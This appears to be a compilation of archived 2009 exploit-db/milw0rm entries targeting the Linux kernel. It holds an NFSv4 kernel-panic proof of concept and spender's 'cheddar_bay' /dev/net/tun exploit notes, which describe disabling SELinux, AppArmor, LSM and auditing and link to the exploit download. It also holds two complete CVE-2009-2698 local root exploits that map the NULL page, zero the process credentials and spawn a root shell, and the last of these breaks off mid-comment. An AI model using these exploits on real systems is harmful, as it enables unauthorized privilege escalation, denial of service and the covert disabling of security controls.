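	 * so success is judged by the credentials we hold afterwards.
	 */
	sendfile(out_fd, in_fd, NULL, PAGE_SIZE);

	close(in_fd);
	close(out_fd);

	if (getuid() != 0) {
		fprintf(stderr, "[-] exploit failed: uid still %lu\n",
			(unsigned long)getuid());
		exit(EXIT_FAILURE);
	}

	execl("/bin/sh", "sh", "-i", NULL);

	/* Only reached if the exec itself failed. */
	perror("execl");
	exit(EXIT_FAILURE);
}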

// milw0rm.com [2009-08-31]


Simon Vallet/Linux Kernel < 2.6.31-rc4 nfs4_proc_lock() Denial of Service ( linux)

Description of problem:

execution of a particular program from the Arachne suite reliably causes a
kernel panic due to a NULL-pointer dereference in nfs4_proc_lock().

Version-Release number of selected component (if applicable):

2.6.18-164.2.1.el5

How reproducible:

Always, as long as the binary being executed is stored on an NFSv4-mounted directory (the PoC below takes a lock on /proc/self/exe, i.e. on itself, so it has to live on NFSv4 too).

Steps to Reproduce:
1. wget http://www.genoscope.cns.fr/externe/redhat/XMLMissingField
2. Save a copy on an NFSv4-mounted directory
3. Execute it

Actual results:

Kernel panic

Expected results:

No panic

Additional info:

Console output:

Unable to handle kernel NULL pointer dereference at 0000000000000030 RIP:
 [<ffffffff8837b210>] :nfs:nfs4_proc_lock+0x21f/0x3ad
PGD 1026eec067 PUD 1026f2f067 PMD 0
Oops: 0000 [1] SMP
last sysfs file: /block/dm-1/range
CPU 0
Modules linked in: ipmi_devintf ipmi_si ipmi_msghandler nfs lockd fscache
nfs_acl sunrpc bonding ipv6 xfrm_nalgo crypto_api video hwmon backlight sbs
i2c_ec button battery asus_acpi acpi_memhotplug ac joydev sg shpchp i2c_nforce2
i2c_core forcedeth dm_snapshot dm_zero dm_mod sata_nv libata mptsas mptscsih
mptbase scsi_transport_sas sd_mod scsi_mod ext3 jbd uhci_hcd ohci_hcd ehci_hcd
Pid: 4070, comm: XMLMissingField Not tainted 2.6.18-164.2.1.el5 #1
RIP: 0010:[<ffffffff8837b210>]  [<ffffffff8837b210>]
:nfs:nfs4_proc_lock+0x21f/0x3ad
RSP: 0018:ffff810819bdbdd8  EFLAGS: 00010246
RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
RDX: ffff810827c52088 RSI: 0000000000000006 RDI: ffff810819bdbe38
RBP: ffff81081a6dfdc0 R08: 0000000000000001 R09: ffff810819bdbd68
R10: ffff810819bdbd68 R11: 00000000000000d0 R12: ffff810827c52088
R13: 0000000000000000 R14: ffff810819a9b930 R15: 0000000000000006
FS:  00002b97d31fc7b0(0000) GS:ffffffff803c1000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 000000008005003b
CR2: 0000000000000030 CR3: 00000010268cb000 CR4: 00000000000006e0
Process XMLMissingField (pid: 4070, threadinfo ffff810819bda000, task
ffff810827d6a7e0)
Stack:  00000000000003e8 0000000000000000 ffff810819a9b930 ffffffff88373e4f
 0000000000000000 0000000000000000 0000000000000000 0000000019a9ba40
 ffff810819bdbe18 ffff810819bdbe18 0000000000000000 0000000000000000
Call Trace:
 [<ffffffff88373e4f>] :nfs:nfs_sync_inode_wait+0x116/0x1db
 [<ffffffff8836a226>] :nfs:do_setlk+0x55/0x8c
 [<ffffffff80039e72>] fcntl_setlk+0x11e/0x273
 [<ffffffff800b66fa>] audit_syscall_entry+0x180/0x1b3
 [<ffffffff8002e5bb>] sys_fcntl+0x269/0x2dc
 [<ffffffff8005d28d>] tracesys+0xd5/0xe0


Code: 49 8b 45 30 4c 89 e6 4c 89 ef 45 8a 74 24 58 48 8b 40 18 48
RIP  [<ffffffff8837b210>] :nfs:nfs4_proc_lock+0x21f/0x3ad
 RSP <ffff810819bdbdd8>
CR2: 0000000000000030
 <0>Kernel panic - not syncing: Fatal exception

PoC:

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>

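/*
 * Proof of concept for the nfs4_proc_lock() NULL dereference reported
 * above: request a shared (F_RDLCK) lock over the whole of our own
 * executable.  The crash only occurs when that executable lives on an
 * NFSv4 mount, because the request is then handled by the NFSv4 client
 * lock path shown in the trace (fcntl_setlk -> do_setlk -> nfs4_proc_lock).
 *
 * argc/argv are unused.  Returns 0 if the lock was granted (i.e. no crash),
 * 1 if /proc/self/exe cannot be opened or F_SETLK fails.
 */
int main(int argc, char **argv)
{
	int fd, err, rc = 0;
	/* l_start and l_len are left 0: lock from offset 0 to end of file. */
	struct flock fl = { .l_type	= F_RDLCK,
			    .l_whence	= SEEK_SET };

	(void)argc;
	(void)argv;

	fd = open("/proc/self/exe", O_RDONLY);
	if (fd < 0) {
		fprintf(stderr, "Couldn't open /proc/self/exe: %s\n",
			strerror(errno));
		return 1;
	}

	/* On a vulnerable NFSv4 client this call does not return: the kernel panics. */
	err = fcntl(fd, F_SETLK, &fl);
	if (err != 0) {
		fprintf(stderr, "setlk errno: %d\n", errno);
		rc = 1;
	}

	/* Drops the lock together with the descriptor. */
	close(fd);

	return rc;
}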


spender/Linux 2.6.30+/SELinux/RHEL5 Test Kernel Local Root Exploit 0day ( linux)

/* super fun 2.6.30+/RHEL5 2.6.18 local kernel exploit in /dev/net/tun
   A vulnerability which, when viewed at the source level, is unexploitable!
   But which, thanks to gcc optimizations, becomes exploitable :)
   Also, bypass of mmap_min_addr via SELinux vulnerability!
   (where having SELinux enabled actually increases your risk against a
    large class of kernel vulnerabilities)

   for 2.6.30 without SELinux enabled, compile with:
   cc -fPIC -fno-stack-protector -shared -o exploit.so exploit.c
   (on a 64bit system -m64 may be necessary to compile a 64bit .so)
   cc -o pwnkernel pwnkernel.c
   then just ./cheddar_bay.sh
   for 2.6.30 with SELinux enabled, compile with:
   cc -fno-stack-protector -o exploit exploit.c
   then just ./exploit

   for RHEL5 2.6.18 compile with:
   cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
   then just ./exploit

   Now on with the show...

   This exploit looks like something I know, something I wrote loooong ago
   in a place... called Cheddar Bay
   the year was 2007, POGS were just rising in the fad section
   I believe you could talk about Friends, it was a viable conversation 
   topic back then
   And back then I had an exploit too, ohhh and what an exploit she was!

   exploiting the 'unexploitable' -- null ptr dereference directly to
   arbitrary code execution, and disabling SELinux & LSM atomically
   the first exploit of its kind!

   2 years later, some code has shifted around, 3 (or 4 depending on how 
   you count) vulnerabilities found in the mainline null ptr dereference 
   protection (added in reaction to the embarrassment from my exploit, 
   not from any proactive initiative), silently-fixing vulnerabilities 
   has become standard operating procedure among the kernel developers, 
   confusing even their own ranks as to what needs to be backported to 
   distro kernels or the stable tree.  So with all this great progress 
   in Linux security, what do I present now 2 years later?

   ********************************************************************
   Bypassing the null ptr dereference protection in the mainline kernel
   via two methods ->
     if SELinux is enabled, it allows pulseaudio to map at 0
     UPDATE: not just that, SELinux lets any user in unconfined_t map at
     0, overriding the mmap_min_addr restriction!  pulseaudio is not
     needed at all!  Having SELinux enabled actually *WEAKENS* system
     security for these kinds of exploits!
     if SELinux is disabled, use personality SVR4 to auto-map at 0 
   Turning a vulnerability which is unexploitable from a review of 
   the source code, where only trojan data can be supplied to a
   structure where no function pointers are called into an arbitrary OR 
   of 0x1 on any byte in memory
   Turning this arbitrary OR into arbitrary code execution by ORing
   an unused file_op on the device we're exploiting
   Abusing this arbitrary code execution to:
	* Disable auditing
	* Disable SELinux
	* Disable AppArmor
	* Disable LSM
	* Make userspace believe SELinux remains in enforcing mode
	* Give ourselves full privileges and capabilities
	* Appropriately increment refcnts so as to be
	* 100% reliable and repeatable
    Whilst providing an entertaining tale of the curse of Cheddar Bay!

    Discovery time of bug in public: 	7/6/09
    Began working on exploit:		7/9/09 6:00PM
    Completed exploit:			7/9/09 8:00PM
    Began port to 64bit:		7/11/09 11:00AM
    Completed port to 64bit:    	7/11/09 12:00PM
    Began port to RHEL5 2.6.18-157:	7/12/09 12:00PM
    Completed port to RHEL5 2.6.18-157:	7/12/09 12:30PM
    Rest of time was spent adding an incredible visual and audio experience

    Greets to Julien Tinnes & Tavis Ormandy for the null ptr dereference
    protection bypass (of which there are more ;) ) 5th time's the charm? :)
    also of course to pipacs for helpful ideas and for pointing out the
    fix for this bug that screamed of suspiciousness ;)
    also to cloud for the wonderful crab
    also to #social for being social
    and to emoflip (under duress so he doesn't stab me next month)

    to xorl.wordpress.com in the hopes that he reports more on silently 
    fixed Linux kernel vulnerabilities :)

    funtimeinternet for the curse of Cheddar Bay:
    http://www.youtube.com/watch?v=l--BvXpaGq4
    Be sure to check out the response videos (which funtimeinternet 
    called "AWESOME"):
    http://www.youtube.com/watch?v=UdkpJ13e6Z0
    http://www.youtube.com/watch?v=P7uyCMdAldM

    Finally to sgrakkyu for his two incredible exploits and nice email chats
    (and for making me realize the more interesting compiler issue here ;))
    http://kernelbof.blogspot.com
    disabling SELinux remotely with a single dword write is just classy ;)

    The commit that introduced the vulnerability (Feb 6th):
    http://mirror.celinuxforum.org/gitstat/commit-detail.php?commit=33dccbb050bbe35b88ca8cf1228dcf3e4d4b3554
    Though it was committed before the release of the 2.6.29 kernel, it 
    did not (thankfully) make it into the 2.6.29 kernel.  It first 
    appeared in 2.6.30.

    Crash appears on April 9th showing a null ptr dereference:
    http://article.gmane.org/gmane.linux.network/124939

    The buggy commit was backported to a RHEL5 test kernel on April 15th
    (the latest test kernel is still vulnerable and likely without this
    exploit being released, the code would have made it into the next
    RedHat kernel update)
    https://bugzilla.redhat.com/show_bug.cgi?id=495863

    Fix appears on July 6th:
    http://lkml.org/lkml/2009/7/6/19
    As you'll note in the fix, the problem was a NULL tun variable, 
    which from the source should have been unexploitable due to the 
    immediate check for !tun.  The dereference of tun to grab ->sk
    would have caused only a crash (or not, if NULL was mapped).  So how 
    was the bug exploitable before but fixed by moving one line of code?
    The reason is that tun is dereferenced before the check for !tun. 
    Dereferencing a NULL pointer is undefined behaviour, so from that point 
    on the compiler is entitled to assume tun is non-NULL and deletes the 
    later check as dead code (GCC's -fdelete-null-pointer-checks).  So the 
    !tun check actually does not exist in the compiled code.  Normally 
    this would be fine, if you could actually ensure that nothing is 
    mapped at NULL, but as this (and previous exploits) have proven, 
    that's not the case :)  So the fix moves the dereference of tun 
    until after !tun is checked -- this time the !tun check actually 
    exists in the code and the vulnerability/exploitability is removed.
    You can see a reference to this sort of problem here:
    http://osdir.com/ml/gcc.cross-compiling.arm/2007-10/msg00003.html
    The kernel should be compiled with -fno-delete-null-pointer-checks
    to remove the possibility of these kinds of vulnerabilities 
    turning exploitable in the future which would be impossible to spot 
    at the source level without this knowledge.

    As of the writing of this, the above fix exists for this vulnerability,
    but it's unlikely to make it into any -stable release (at least, 
    not until after this exploit is released) because as we say in 
    Linux kernel development circles, there are no vulnerabilities, just 
    DoS bugs and silent fixes.  When no one seems to care to classify 
    bugs properly or put any real effort into determining the impact of a 
    vulnerability (leading to everything being called DoSes with no 
    justification), then even the maintainers don't know what should be 
    included in the "stable" kernels, leaving users vulnerable and 
    attackers with beautiful, 100% reliable vulnerabilities like this 
    one to exploit.

    It's at these times that I take comfort in the words of security 
    expert Linus Torvalds, who steers the good ship Linux into safer 
    seas.  As we read at http://article.gmane.org/gmane.linux.kernel/848718
    he's been blessed with the foresight to claim that "we could 
    probably drop PAE some day," calling upon his own insight that "I'd 
    also not ever enable it on any machine I have.  PAE does add 
    overhead, and the NX bit isn't _that_ important to me."

    ****** UPDATE! 07/11/09 *******

    A man riding on horseback has delivered some news, my 
    congratulations to the members of vendor-sec for their excellent 
    analysis of my first exploit video, much in the same vein as their 
    analyses of vulnerabilities in the kernel.  Watch the masters hone 
    their craft:

    Vincent Danen:
    "Possibly, or another issue we've been discussing on vendor-sec, which
     would mean the problem is two fold; a problem with a setuid app and 
     a problem with SELinux (or, more probably, defined rules).

     He throws AppArmor and LSM in there as well as being faulty, but I 
     think that might be incorrect (let's remember spender's grsec 
     agenda) -- you would have to see if there are rules specifically for
     preventing this kind of thing in order to know if the fault is in 
     the rules or in the kernel itself."

    sometime later..

    "Yeah, just saw Marc's post and looked at the blog entry.  The 
     coincidence with the pulseaudio issue we were looking at seemed 
     odd, considering certain history with info on vendor-sec being 
     disclosed by spender."

    Linus Torvalds:
    "That does not look like a kernel problem to me at all.
     He's running a setuid program that allows the user to specify its 
     own modules.  And then you people are surprised he gets local root?"

    sometime later after video #3 (where I show RHEL5 getting owned)...

    Willy Tarreau (who is actually a nice guy, just stuck between a 
    rock and a hard place at times considering the people he has to 
    cooperate with, also I appreciate his continued work on 2.4):
    "He shows minor parts of his exploit code (only a few comments in fact)
     with one part half-hidden saying "the NX bit isn't _that_ important 
     to me". I don't think that will ring a bell to anyone :-/"

    and then:

    "He claims he exploits a flaw in SELinux and doesn't require pulseaudio.
     Maybe some recent SELinux fixes got backported into that kernel, 
     which might help narrow the issue down to less code ?"

    followed by:

    "Well, I see a positive note on all of that : the mmap_min_addr is 
     really efficient at limiting null pointer abuse ; the guys now have 
     to find a weak setuid program in order to deref null pointers. Of 
     course that does not mean anything particularly good for our 
     drivers (or whatever derefs a null pointer), but it means that 
     kernel is already really good at protecting itself.

     I've just checked the grsec site (http://www.grsecurity.net/) and 
     did not see any patch for 2.6.30. However, a patch was released 
     yesterday for 2.6.29.6 (but I don't have the previous one to diff 
     against). So maybe the null deref he's apparently exploiting is 
     also present in 2.6.29. It is highly possible that the issue is 
     fixed or worked around in his latest patch so that he can show his 
     kernels are not affected.

     I've just checked the latest patch, and except for a few minor 
     fixes in acpi, doc2001 and relay.c which don't look really suspect, 
     I see nothing obvious. So maybe it's 100% 2.6.30-specific and he 
     still has no fix for it in his patches :-/"

    Markus Meissner:
    "If someone has time he could decode the "Resolved <removed for vid> 
     to 0xfffff" offsets to a ubuntu 64bit kernel. :/"

    So much sadness! And it's funny, none of them emailed me to ask 
    anything.  Probably because they choose to operate in secrecy, 
    depending upon the spies (it's not cool or ethical to spy, guys :P)
    they have in some public channels I frequent (which is the only way 
    they found out about the videos -- I hadn't posted links to them 
    anywhere else).  I'm amazed they come to the conclusions they came 
    to, as if I didn't just release a very similar exploit in 2007 that 
    attacked the *kernel* via a *null ptr dereference* and then 
    *disabled SELinux & LSM*.  The fact that pulseaudio was used and 
    was discussed publicly in Julien's blog regarding its use for 
    bypassing mmap_min_addr "protection" surely didn't ring any bells.  
    The fact that I'm throwing around kernel addresses and suggesting 
    that at least one of the addresses is being written to clearly 
    shows this is not a kernel problem at all -- good call Linus.  I'm 
    glad this arm-chair security expert discussion goes on in private; 
    it'd be pretty embarrassing if it were public :)

    "I think a little public shaming might not be a bad idea"
		- Linus Torvalds (http://lkml.org/lkml/2007/6/19/256)

    "I really _despise_ people who think security is an issue of hiding 
     bugs.  If they then try to make themselves look good ("no zero-day 
     exploit, we fixed it immediately"), they're worse than low.

     The only thing that seems to work for security is public shaming.

     And yeah, I get personally embarrassed by some of the things we've 
     had too, and some of that public shaming from the bug can well fall 
     on me.  I've had cases where I've simply _forgotten_ about some bug 
     that was reported to me, or more commpnly [sic] just overlooked it. 
     Shame on me.  That's ok."
		-Linus Torvalds (circa 2006)

    PS (to vendorsec, etc): though you will never thank me (or sgrakkyu, 
    or Julien), you're welcome for all this free security research, 
    which could have been sold in private instead.  The industry isn't 
    what it was like in 2000, people don't publish things anymore: they 
    make money off them.  Not seeing exploits published doesn't mean 
    you're doing a good job anymore.  Have you noticed that the 
    complex exploits that have been released are released unpossibly 
    quickly after the vulnerability is finally fixed?  There's a reason 
    for that.  If the vulnerable code in this case had happened to have 
    gone into the 2.6.29 kernel instead of 2.6.30 (which won't be used 
    for vendor kernels) I likely wouldn't have published.  I have no 
    use for exploits, but a good laugh is only worth so much.  My 
    suggestion to you is to hire a couple of sgrakkyus or Juliens 
    instead of old guys who have never written an exploit, since other 
    than Stealth, I don't know of anyone skilled in the industry that 
    you actually employ.  A second suggestion: as you are companies 
    promoting open source, free software, it would be nice if the 
    justifications for your vulnerability classifications were more 
    transparent (or made available at all).  The old game of calling 
    everything for which a public exploit doesn't exist a DoS for no 
    reason is getting very tired, and it's not fooling anyone. Third, 
    the official policy of intentionally omitting security relevant 
    information in modifications to the Linux codebase is a disgrace 
    and a disservice to yourselves, to other vendors, and to your 
    customers. It demonstrates a lack of integrity and trust in your 
    own products, though I know you have no intention of changing this 
    policy as you're currently enjoying a reputation for security that 
    is ill-gotten and has no basis in reality.  Truthfully representing 
    the seriousness of vulnerabilities in your software would tarnish 
    that image, and that's not good for business.  You're praised when 
    you cover things up, and yet Microsoft is the one with the bad 
    reputation.  If you were to follow the suggestions above, then 
    maybe your security wouldn't be the laughing stock of the industry.

    Play these jokers out, keyboard cat --
    http://www.youtube.com/watch?v=J---aiyznGQ
*/

http://grsecurity.net/~spender/cheddar_bay.tgz

backup: http://exploit-db.com/sploits/2009-cheddar_bay.tgz

# milw0rm.com [2009-07-17]


INetCop Security/Linux Kernel 2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit ( linux)

/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by <p0c73n1(at)gmail(dot)com>.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>

/* Caller's ids, filled in by main() before the trigger. */
unsigned int uid, gid;

/*
 * Ring-0 payload body, reached from the `exploit' asm stub below with the
 * current task_struct as its argument.
 *
 * Walks forward from @task one 32-bit word at a time until it finds four
 * consecutive words equal to our uid -- presumably uid/euid/suid/fsuid --
 * then clears those four and the four words that follow them (the gids).
 *
 * There is no upper bound on the walk: if the pattern never appears the
 * scan runs past the task_struct until it faults.
 */
void get_root_uid(unsigned *task)
{
	unsigned *cursor = task;

	for (;;) {
		int matched = cursor[0] == uid && cursor[1] == uid &&
			      cursor[2] == uid && cursor[3] == uid;

		if (matched)
			break;
		cursor++;
	}

	/* uids */
	cursor[0] = 0;
	cursor[1] = 0;
	cursor[2] = 0;
	cursor[3] = 0;
	/* gids */
	cursor[4] = 0;
	cursor[5] = 0;
	cursor[6] = 0;
	cursor[7] = 0;
}
/* Global asm label defined inside kernel_code() below; declared here but not referenced by the visible code. */
void exploit();
/*
 * Ring-0 stub.  The zero page written by main() ends in `jmp *kernel',
 * which lands on the entry of this function (prologue included).  The asm
 * then: saves eax; rounds esp down to 4 KiB to reach thread_info and
 * reads its first word as the task_struct pointer; pushes it and calls
 * get_root_uid(); restores eax.
 *
 * NOTE(review): the 4 KiB rounding assumes 4K kernel stacks (thread_info
 * at a 4K-aligned base).  The hoagie exploit later on this page masks
 * with 0xffffe000 instead; which is right depends on the target's stack
 * size.  Because control arrives by jmp rather than call, this function's
 * own ret returns straight to the kernel code that made the NULL call,
 * so the `ret' byte at 0x0b in the zero page is not reached on this path.
 */
void kernel_code()
{
	asm("exploit:\n"
		"push %eax\n"
		"movl $0xfffff000,%eax\n"
		"andl %esp,%eax\n"
		"pushl (%eax)\n"
		"call get_root_uid\n"
		"addl $4,%esp\n"
		"popl %eax\n");
	return;
}
/* Memory operand of the zero page's indirect jmp (see main()): holds the address of kernel_code. */
void *kernel=kernel_code;

/*
 * Entry point (i386 only: the stub above is 32-bit asm).
 *
 *  1. Refuse to run as root (the success check below relies on the uid
 *     changing).
 *  2. Make page zero writable+executable: under the SVR4 personality it
 *     is presumably already mapped (hence mprotect), otherwise it is
 *     mmap'd MAP_FIXED -- which needs low mappings to be permitted.
 *  3. Write a small stub there (layout in the comment below).
 *  4. Send two datagrams on a UDP socket, the first corked with
 *     MSG_MORE|MSG_PROXY and the second plain; the second is the one that
 *     reaches the NULL call (see the hoagie exploit's comment on the
 *     up->pending path further down this page).
 *  5. Check the uid changed and exec an interactive shell.
 *
 * Returns -1 on setup failure or when the uid is unchanged; does not
 * return on success.  The sendto() results are deliberately ignored.
 */
int main(int argc, char **argv)
{
	int fd=0;
	char buf[1024];
	struct sockaddr x0x;
	void *zero_page;

	uid=getuid();
	gid=getgid();
	if(uid==0){
		fprintf(stderr,"[-] check ur uid\n");
		return -1;
	}
	/* personality(0xffffffff) only queries the current persona, it does not change it. */
	if(personality(0xffffffff)==PER_SVR4){
		if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
			perror("[-] mprotect()");
			return -1;
		}
	}
	else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
			perror("[-] mmap()");
			return -1;
	}
	/*
	 * Zero-page stub, executed when the kernel calls through NULL:
	 *   0x00  90 90 90 90 90     nop sled
	 *   0x05  ff 25 <&kernel>    jmp *kernel  (indirect through the
	 *                            `kernel' variable -> kernel_code)
	 *   0x0b  c3                 ret (not reached: the jmp never returns here)
	 */
	*(unsigned long *)0x0=0x90909090;
	*(char *)0x00000004=0x90; /* fifth nop */
	*(char *)0x00000005=0xff;
	*(char *)0x00000006=0x25;
	*(unsigned long *)0x00000007=(unsigned long)&kernel;
	*(char *)0x0000000b=0xc3;

	if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
		perror("[-] socket()");
		return -1;
	}
	/* Destination with family AF_UNSPEC and 0x82 filler; a zeroed 1 KiB payload. */
	x0x.sa_family=AF_UNSPEC;
	memset(x0x.sa_data,0x82,14);
	memset((char *)buf,0,sizeof(buf));
	sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
	sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
	/* Success is judged by the effect on our credentials, not by the sendto() results. */
	if(getuid()==uid){
		printf("[-] exploit failed, try again\n");
		return -1;
	}
	close(fd);
	execl("/bin/sh","sh","-i",NULL);
	return 0;
}

/* eoc */

// milw0rm.com [2009-08-31]


andi/Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit ( linux)

/***********************************************************
 * hoagie_udp_sendmsg.c
 * LOCAL LINUX KERNEL ROOT EXPLOIT (< 2.6.19) - CVE-2009-2698
 *
 * udp_sendmsg bug exploit via (*output) callback function
 * used in dst_entry / rtable
 *
 * Bug reported by Tavis Ormandy and Julien Tinnes 
 * of the Google Security Team
 *
 * Tested with Debian Etch (r0)
 *
 * $ cat /etc/debian_version
 * 4.0
 * $ uname -a
 * Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux
 * $ gcc hoagie_udp_sendmsg.c -o hoagie_udp_sendmsg
 * $ ./hoagie_udp_sendmsg
 * hoagie_udp_sendmsg.c - linux root < 2.6.19 local
 * -andi / void.at
 *
 * sh-3.1# id
 * uid=0(root) gid=0(root) Gruppen=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(andi)
 * sh-3.1#
 *
 * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
 * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
 * DAMAGE DONE USING THIS PROGRAM.
 *
 * VOID.AT Security
 * andi@void.at
 * http://www.void.at
 *
 ************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/mman.h>

/**
 * Ring-0 payload, installed by main() as the (*output) callback at offset
 * 0x74 of the fake rtable mapped at address 0; called from NF_HOOK with an
 * sk_buff argument that is ignored.
 *
 * Locates the current task through the 8 KiB-aligned kernel stack
 * (thread_info at the stack base, task pointer in its first word) and
 * stores zero at eight hard-coded task_struct offsets from 0x150 --
 * presumably uid/euid/suid/fsuid/gid/egid/sgid/fsgid for the tested
 * 2.6.18-4-686 build.  There is no search, so any other build needs its
 * own offsets.
 *
 * NOTE(review): the 4th and 8th stores use 0x15a and 0x16a, which are not
 * 4-byte aligned and straddle the neighbouring fields; they look like
 * typos for 0x15c and 0x16c.  As written they zero bytes 0x15a-0x15d and
 * 0x16a-0x16d, so a field at 0x15c/0x16c is fully cleared only while its
 * value fits in 16 bits -- which is why this happens to work for small ids.
 * Only eax is saved and restored; eflags are clobbered, which is fine for a
 * C-ABI callback.
 */
void set_current_task_uids_gids_to_zero() {
   asm("push %eax\n"
       "movl $0xffffe000, %eax\n"
       "andl %esp, %eax\n"
       "movl (%eax), %eax\n"
       "movl $0x0, 0x150(%eax)\n"
       "movl $0x0, 0x154(%eax)\n"
       "movl $0x0, 0x158(%eax)\n"
       "movl $0x0, 0x15a(%eax)\n"
       "movl $0x0, 0x160(%eax)\n"
       "movl $0x0, 0x164(%eax)\n"
       "movl $0x0, 0x168(%eax)\n"
       "movl $0x0, 0x16a(%eax)\n"
       "pop  %eax\n");
}

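/*
 * Entry point (i386 only: the payload is 32-bit asm and its address is
 * stored through an int).
 *
 *  1. Map a page at address 0 to stand in for the struct rtable the kernel
 *     will dereference through a NULL rt pointer, and store the address of
 *     set_current_task_uids_gids_to_zero() at the (*output) slot, offset
 *     0x74 (layout below).
 *  2. Send two zero-length UDP datagrams to 127.0.0.1: the first with
 *     MSG_MORE leaves up->pending set, so the second enters
 *     ip_append_data() with rt == NULL and the kernel calls our callback
 *     through the fake rtable.
 *  3. Confirm the ids were cleared, then exec an interactive shell.
 *
 * argc/argv are unused.  Exit status: -1 on setup failure, 1 if the trigger
 * did not yield root or the exec fails; does not return on success.
 */
int main(int argc, char **argv) {
   int s;
   struct msghdr header;
   struct sockaddr_in sin;
   char *rtable = NULL;
   unsigned int orig_uid = getuid();

   (void)argc;
   (void)argv;

   /* Banner matches the header comment and its sample output: "< 2.6.19". */
   fprintf(stderr,
           "hoagie_udp_sendmsg.c - linux root < 2.6.19 local\n"
           "-andi / void.at\n\n");

   /* The success check below relies on the uid changing. */
   if (orig_uid == 0) {
      fprintf(stderr, "[*] already root, nothing to do\n");
      exit(-1);
   }

   s = socket(PF_INET, SOCK_DGRAM, 0);
   if (s == -1) {
      fprintf(stderr, "[*] can't create socket\n");
      exit(-1);
   }

   /**
    * initialize required variables: a message with no iov (zero-length
    * payload) addressed to 127.0.0.1:22
    */
   memset(&header, 0, sizeof(struct msghdr));
   memset(&sin, 0, sizeof(struct sockaddr_in));
   sin.sin_family = AF_INET;
   sin.sin_addr.s_addr = inet_addr("127.0.0.1");
   sin.sin_port = htons(22);
   header.msg_name = &sin;
   header.msg_namelen = sizeof(sin);

   /**
    * and this is the trick:
    * we can use (*output)(struct sk_buff*) from dst_entry (used by rtable) as a callback (=> offset 0x74)
    * so we map our rtable buffer at offset 0 and set output callback function
    *
    * struct dst_entry
    * {
    *         struct dst_entry        *next;
    *         atomic_t                __refcnt;       client references
    *         int                     __use;
    *         struct dst_entry        *child;
    *         struct net_device       *dev;
    *         short                   error;
    *         short                   obsolete;
    *         int                     flags;
    * #define DST_HOST                1
    * #define DST_NOXFRM              2
    * #define DST_NOPOLICY            4
    * #define DST_NOHASH              8
    * #define DST_BALANCED            0x10
    *         unsigned long           lastuse;
    *         unsigned long           expires;
    * 
    *         unsigned short          header_len;     * more space at head required *
    *         unsigned short          trailer_len;    * space to reserve at tail *
    * 
    *         u32                     metrics[RTAX_MAX];
    *         struct dst_entry        *path;
    * 
    *         unsigned long           rate_last;      * rate limiting for ICMP *
    *         unsigned long           rate_tokens;
    * 
    *         struct neighbour        *neighbour;
    *         struct hh_cache         *hh;
    *         struct xfrm_state       *xfrm;
    * 
    *         int                     (*input)(struct sk_buff*);
    *         int                     (*output)(struct sk_buff*);
    * 
    * #ifdef CONFIG_NET_CLS_ROUTE
    *         __u32                   tclassid;
    * #endif
    * 
    *         struct  dst_ops         *ops;
    *         struct rcu_head         rcu_head;
    * 
    *         char                    info[0];
    * };
    *
    * struct rtable
    * {
    *         union
    *         {
    *                 struct dst_entry        dst;
    *                 struct rtable           *rt_next;
    *         } u;
    *
    *         struct in_device        *idev;
    *
    *         unsigned                rt_flags;
    *         __u16                   rt_type;
    *         __u16                   rt_multipath_alg;
    *
    *         __be32                  rt_dst; * Path destination     *
    *         __be32                  rt_src; * Path source          *
    *         int                     rt_iif;
    *
    *         * Info on neighbour *
    *         __be32                  rt_gateway;
    *
    *         * Cache lookup keys *
    *         struct flowi            fl;
    *
    *         * Miscellaneous cached information *
    *          __be32                  rt_spec_dst; * RFC1122 specific destination *
    *         struct inet_peer        *peer; * long-living peer info *
    * };
    *
    * The mapping at address 0 needs low mappings to be permitted
    * (mmap_min_addr); the page is also left PROT_EXEC so the rest of it
    * could hold code, although only the 0x74 slot is used.
    */
   rtable = mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
   if (rtable == MAP_FAILED) {
      fprintf(stderr, "[*] mmap failed\n");
      exit(-1);
   }
   *(int *)(rtable + 0x74) = (int)set_current_task_uids_gids_to_zero;

   /* trigger exploit
    *
    * the second sendmsg() call will call ip_append_data() with rt == NULL
    * because of:
    * if (up->pending) {
    *          *
    *          * There are pending frames.
    *          * The socket lock must be held while it's corked.
    *          *
    *          lock_sock(sk);
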